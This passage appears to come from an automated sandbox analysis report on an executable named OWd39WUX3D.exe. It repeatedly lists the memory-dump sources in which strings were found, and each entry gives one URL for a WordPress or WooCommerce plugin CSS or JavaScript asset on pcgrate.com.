              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
